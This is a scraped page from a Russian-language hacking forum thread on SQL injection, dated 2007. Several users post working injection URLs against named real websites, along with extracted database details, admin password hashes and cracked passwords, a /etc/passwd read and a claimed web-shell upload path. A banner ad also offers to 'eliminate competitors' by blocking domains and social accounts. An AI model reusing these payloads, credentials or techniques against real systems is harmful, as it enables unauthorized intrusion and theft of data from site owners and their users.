Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 359 из 1242

359

Опции темы

Поиск в этой теме

Опции просмотра

#3581

07.11.2007, 21:21

fRg

Участник форума

Регистрация: 28.12.2006

Сообщений: 111

Провел на форуме:
500695

Репутация: 524

Отправить сообщение для fRg с помощью ICQ

aim-mia.de

Код:

http://www.aim-mia.de/categories.php?catid=-1+union+select+concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71)),aes_decrypt(aes_encrypt(user(),0x71),0x71)/*

85 таблиц:

Код:

http://www.aim-mia.de/categories.php?catid=-1+union+select+aes_decrypt(aes_encrypt(table_name,0x71),0x71),2+from+information_schema.tables+limit+84,1/*

root:

Код:

http://www.aim-mia.de/categories.php?catid=-1+union+select+aes_decrypt(aes_encrypt(USER,0x71),0x71),aes_decrypt(aes_encrypt(PASSWORD,0x71),0x71)+from+MYSQL.USER+limit+0,1/*

ROOT:*980166F60E2FA650E7930113CDCA43D3BA726973
Интересные таблицы: JOS_USERS и ADMINBLOCK (есть и другие...)

#3582

08.11.2007, 00:37

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

logobook.ru

Код:

http://www.logobook.ru/prod_show.php?object_uid=11122009%20or%201=(select%20db_name())--

version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
system_user: sa
db_name: Images

emigranty.ru

Код:

http://www.emigranty.ru/letters.php?lid=-38+union+select+1,2,concat_ws(char(58),version(),user(),database())+--+

5.0.22-Debian_0ubuntu6.06.5-log:emigrantyr@uvirt4.active24.cz:emigrantyr

/etc/passwd

Код:

http://www.emigranty.ru/letters.php?lid=-38+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),concat_ws(char(58),version(),user(),database())+--+

Код:

http://www.emigranty.ru/letters.php?lid=-38+union+select+1,2,concat_ws(char(58),uLogin,uPass)+from+emg_user+--+

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

#3583

08.11.2007, 01:17

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Решил выложить в паблик
RAP.ru

Цитата:

http://www.rap.ru/_Includes/redirect.php?banner_id=-204+union+select+1,2,3,4,5,version(),7/*

5.0.30-Debian_3-log
Cоответственно информ шема и таблица Admins
Поля Nick и Passwd
Administrator:bf7b9529faef3cf1cb6f56dca50c86df:dtc yfktnj
finger:d47e7c43b07bfbe06be1f88acb48d482
есть админка на rap.ru/admin - но там бейсик авторизация по .htpasswd
На форуме не получается залогинится под одним из админов, так же нет доступа к бд форума через инъект
ЗЫ Там же на сайте, в поиске XSS =)
Админы не закроют багу до поднятия шела, ибо им пофек =)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#3584

08.11.2007, 01:30

FoxMALDER

Познающий

Регистрация: 26.07.2007

Сообщений: 50

Провел на форуме:
177050

Репутация: 62

Сильно не пинайте... Первый вклад

SQL-Inj...

Код:

http://asamsu.ru/asamsu.php?id=-1+union+select+0,1,concat(version(),char(58),user(),char(58),database()),3/*

Нарыл таблицы...

Код:

asa_news, asa_partners, asa_foto, asa_video, asa_dance, asa_materials, asa_pres, asa_price

Копаю дальше. Вот ошибка и база к форуму...

Код:

http://www.asamsu.ru/forum/index.php?showtopic=978&st=-1

А дальше, дело техники...

Код:

http://asamsu.ru/asamsu.php?id=-1+union+select+0,1,concat(converge_id,char(58),converge_email,char(58),converge_joined,char(58),converge_pass_hash,char(58),converge_pass_salt),3+from+asamsu_forum.forum_members_converge+where+converge_id=1/*

P.S.: Немного колдовства над паролем админа и шелл залит...

Код:

http://www.asamsu.ru/img/news/av-2919.php

#3585

08.11.2007, 01:38

Dr.Z3r0

Leaders of The World

Регистрация: 06.07.2007

Сообщений: 246

Провел на форуме:
2030482

Репутация: 1796

Код:

http://www.aldenvet.kiev.ua/news/viewnews.php?kley=-1478 UNION SELECT1,2,VERSION(),4,5,6,7

4 версия
Ничего интерсного случайно наткнулся... Если кому интересно рядом стоит форум phpbb

__________________

Кто я?..

www.wiredforhealth.gov.uk

#3586

08.11.2007, 02:46

L0rd_Ha0S

Участник форума

Регистрация: 25.01.2006

Сообщений: 158

Провел на форуме:
1000724

Репутация: 361

www.wiredforhealth.gov.uk

Код:

http://www.wiredforhealth.gov.uk/cat.php?catid=-1+union+select+1,2,3/*

Код:

http://www.wiredforhealth.gov.uk/search.php?catid=-1+union+select+1,2,3/*

Код:

http://www.wiredforhealth.gov.uk/feedback.php?catid=-1+union+select+1,2,3/*

Теперь самое интересное.

Blind SQL-injecting

Код:

http://www.wiredforhealth.gov.uk/cat.php?catid=857+and+ascii(lower(substring((select+password+from+mysql.user+where+user='root'+limit+1),1,1)))<110

database_name = webstructure
user = root@localhost
version = 4.1.0-alpha-loh
root:758a0e1c73f5e6fa:garand01
host = % - разрешено с любого хоста

Предположительно, сервер работает под SunOS.
Работает LOAD_FILE().
Уже несколько месяцев прошло, админ до сих пор не прикрыл баги (вероятно, ему пофигу), поэтому и выкладываю.

#3587

08.11.2007, 03:17

Sokoloff

Новичок

Регистрация: 05.11.2007

Сообщений: 1

Провел на форуме:
31893

Репутация: 0

delete please

Последний раз редактировалось Sokoloff; 08.11.2007 в 03:58..

#3588

08.11.2007, 03:43

FoxMALDER

Познающий

Регистрация: 26.07.2007

Сообщений: 50

Провел на форуме:
177050

Репутация: 62

torpal.com.ua - торговое оборудование
Версия: 5.0.27
Пользователь: torpal@localhost

Код:

http://www.torpal.com.ua/faq/?pm=-1+union+select+1,2,3,4,5,6,7,8,concat(version(),char(58),user(),char(58),database()),10,11,12/*

Код:

http://www.torpal.com.ua/faq/?pm=-1+union+select+1,2,3,4,5,6,7,8,concat(login,char(58),password),10,11,12+from+t_users/*

P.S.: Админку не нашел

#3589

08.11.2007, 04:44

FoxMALDER

Познающий

Регистрация: 26.07.2007

Сообщений: 50

Провел на форуме:
177050

Репутация: 62

ctk.kiev.ua - центральные театральные кассы
Версия: 4.0.27-standard-log
Пользователь: ctk_admin@localhost

Код:

http://www.ctk.kiev.ua/?area_id=2&id=-1+union+select+1,2,3,4,5,6,concat(version(),char(58),user(),char(58),database()),8,9,10,11,12,13,14,15,16,17,18,19/*

Надыбал таблицу 'categories':

Код:

http://www.ctk.kiev.ua/?area_id=2&id=-1+union+select+1,2,3,4,5,6,concat(id,char(58),name),8,9,10,11,12,13,14,15,16,17,18,19+from+categories/*

Собственно рядом phpBB в нокауте лежит

Admin:61630e9cf1332bc73777a4238cc6fdfa:ctk@inet.ua

Код:

http://www.ctk.kiev.ua/?area_id=2&id=-1+union+select+1,2,3,4,5,6,concat(username,char(58),user_password,char(58),user_email),8,9,10,11,12,13,14,15,16,17,18,19+from+phpbb_users+where+user_level=1/*

P.S.: У кого есть интерес глубже копать - делитесь плодами...

#3590

08.11.2007, 05:47

Mobile

Регистрация: 18.02.2006

Сообщений: 1,090

Провел на форуме:
6489333

Репутация: 1564

Отправить сообщение для Mobile с помощью ICQ

Sokoloff выложи ссылку на "интересное место"

Страница 359 из 1242

359

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход